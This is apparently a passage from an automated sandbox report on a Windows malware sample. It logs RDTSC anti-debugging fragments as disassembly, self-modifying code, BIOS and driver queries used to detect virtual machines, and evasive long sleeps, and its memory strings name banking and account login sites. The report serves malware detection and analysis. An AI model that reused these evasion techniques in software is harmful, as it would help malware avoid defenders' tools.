                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0AB0 second address: 50F0AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FC57C52C31Bh 0x0000000b adc ch, FFFFFFAEh 0x0000000e jmp 00007FC57C52C329h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC57C52C31Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0AF2 second address: 50F0AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0AF8 second address: 50F0AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E030D second address: 50E0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57CD4ED04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0325 second address: 50E0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0329 second address: 50E0354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c call 00007FC57CD4ECFDh 0x00000011 pop ebx 0x00000012 mov al, F1h 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC57CD4ECFBh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0354 second address: 50E03B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 68CAh 0x00000007 pushfd 0x00000008 jmp 00007FC57C52C31Bh 0x0000000d xor ecx, 1F75B36Eh 0x00000013 jmp 00007FC57C52C329h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebx 0x0000001f jmp 00007FC57C52C31Eh 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC57C52C327h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E03B5 second address: 50E03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E03BB second address: 50E03BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E03BF second address: 50E03E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FC57CD4ECFAh 0x00000012 and ch, 00000078h 0x00000015 jmp 00007FC57CD4ECFBh 0x0000001a popfd 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E03E5 second address: 50E0403 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FC57C52C325h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E044B second address: 50E0451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0451 second address: 50E0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0584 second address: 50E058A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E058A second address: 50E05B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC57C52C31Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0614 second address: 50E0638 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 3A30h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jg 00007FC5EE5CCB65h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC57CD4ED01h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0638 second address: 50E063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E063C second address: 50E0642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0642 second address: 50E0649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0649 second address: 50E0695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FC57CD4ED9Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC57CD4ED01h 0x00000016 and eax, 703D0316h 0x0000001c jmp 00007FC57CD4ED01h 0x00000021 popfd 0x00000022 call 00007FC57CD4ED00h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0695 second address: 50E069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E069B second address: 50E069F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E069F second address: 50E072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007FC57C52C326h 0x00000010 jne 00007FC5EDDAA0F1h 0x00000016 pushad 0x00000017 mov dl, cl 0x00000019 pushfd 0x0000001a jmp 00007FC57C52C323h 0x0000001f sbb ax, DA5Eh 0x00000024 jmp 00007FC57C52C329h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+08h] 0x0000002e jmp 00007FC57C52C31Eh 0x00000033 lea eax, dword ptr [ebp-2Ch] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC57C52C327h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E072A second address: 50E0779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov eax, 064DFA83h 0x00000010 mov si, BBDFh 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007FC57CD4ED05h 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC57CD4ECFDh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0779 second address: 50E077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E077F second address: 50E0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0783 second address: 50E0860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FC57C52C320h 0x00000010 pop ecx 0x00000011 mov di, 4E16h 0x00000015 popad 0x00000016 call 00007FC57C52C327h 0x0000001b mov ah, 99h 0x0000001d pop edx 0x0000001e popad 0x0000001f mov dword ptr [esp], eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC57C52C31Eh 0x00000029 sbb ax, 4968h 0x0000002e jmp 00007FC57C52C31Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007FC57C52C328h 0x0000003a xor cx, 9BC8h 0x0000003f jmp 00007FC57C52C31Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 jmp 00007FC57C52C324h 0x0000004d pushfd 0x0000004e jmp 00007FC57C52C322h 0x00000053 sub cx, E158h 0x00000058 jmp 00007FC57C52C31Bh 0x0000005d popfd 0x0000005e popad 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FC57C52C324h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E001A second address: 50E001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E001E second address: 50E0024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0024 second address: 50E0035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0035 second address: 50E00A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC57C52C31Ah 0x00000010 xor ah, FFFFFFD8h 0x00000013 jmp 00007FC57C52C31Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a pushfd 0x0000001b jmp 00007FC57C52C31Fh 0x00000020 sub si, 489Eh 0x00000025 jmp 00007FC57C52C329h 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC57C52C329h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E00A9 second address: 50E00AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E00AF second address: 50E00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC57C52C326h 0x0000000b add esi, 70CFAC28h 0x00000011 jmp 00007FC57C52C31Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f movzx ecx, di 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E00E8 second address: 50E012F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC57CD4ED07h 0x00000008 sub ax, FE1Eh 0x0000000d jmp 00007FC57CD4ED09h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov si, EBE7h 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E012F second address: 50E0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0133 second address: 50E0139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0139 second address: 50E013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E013E second address: 50E014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E014C second address: 50E0150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0150 second address: 50E0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0154 second address: 50E015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E015A second address: 50E01BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC57CD4ED08h 0x00000009 add cx, 95A8h 0x0000000e jmp 00007FC57CD4ECFBh 0x00000013 popfd 0x00000014 jmp 00007FC57CD4ED08h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e mov edi, eax 0x00000020 mov edi, ecx 0x00000022 popad 0x00000023 mov dword ptr [ebp-04h], 55534552h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC57CD4ECFBh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0B83 second address: 50E0BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC57C52C323h 0x00000013 sbb si, 606Eh 0x00000018 jmp 00007FC57C52C329h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0BD1 second address: 50E0BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0BD6 second address: 50E0C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC57C52C322h 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FC57C52C320h 0x00000016 mov ebp, esp 0x00000018 jmp 00007FC57C52C320h 0x0000001d cmp dword ptr [769B459Ch], 05h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push edx 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0CA5 second address: 50E0CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0CA9 second address: 50E0CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0CAF second address: 50E0CED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC57CD4ED00h 0x00000008 mov ax, 93D1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f call 00007FC5EE5C3B9Fh 0x00000014 push 76952B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [769B4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007FC57CD4ED09h 0x00000061 push ecx 0x00000062 pop ebx 0x00000063 popad 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0CED second address: 50E0D17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov ch, 1Ch 0x0000000e popad 0x0000000f mov dword ptr [ebp-1Ch], esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC57C52C31Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50E0DB8 second address: 50E0DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0B2E second address: 50F0B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0B3D second address: 50F0B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0B43 second address: 50F0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0B47 second address: 50F0B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FC57CD4ECFCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0B64 second address: 50F0BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC57C52C322h 0x0000000f sbb cx, 11A8h 0x00000014 jmp 00007FC57C52C31Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dx, ax 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BA3 second address: 50F0BB1 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BB1 second address: 50F0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC57C52C31Dh 0x0000000a xor esi, 49887476h 0x00000010 jmp 00007FC57C52C321h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BDC second address: 50F0C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC57CD4ED07h 0x00000009 xor si, 59AEh 0x0000000e jmp 00007FC57CD4ED09h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC57CD4ED00h 0x0000001a xor si, FB28h 0x0000001f jmp 00007FC57CD4ECFBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 7BEDCBB1h 0x00000031 mov al, 71h 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0C47 second address: 50F0C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0C4D second address: 50F0CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FC57CD4ECFEh 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 pushad 0x00000013 mov esi, 307C3693h 0x00000018 mov eax, 1F29A8EFh 0x0000001d popad 0x0000001e mov di, si 0x00000021 popad 0x00000022 test esi, esi 0x00000024 jmp 00007FC57CD4ECFEh 0x00000029 je 00007FC5EE5AC425h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC57CD4ED07h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0CA7 second address: 50F0D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 jmp 00007FC57C52C31Eh 0x00000015 je 00007FC5EDDA1AD4h 0x0000001b pushad 0x0000001c jmp 00007FC57C52C31Eh 0x00000021 mov dl, cl 0x00000023 popad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FC57C52C31Fh 0x0000002d pop ecx 0x0000002e mov al, bl 0x00000030 popad 0x00000031 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 428AA5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 428B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 5C3DA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 65A6AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1282Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1273Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1178Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 5580Thread sleep count: 76 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 5580Thread sleep time: -152076s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 2156Thread sleep count: 1282 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 2156Thread sleep time: -2565282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3620Thread sleep count: 1273 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3620Thread sleep time: -2547273s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 936Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3220Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 4364Thread sleep count: 1178 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 4364Thread sleep time: -2357178s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
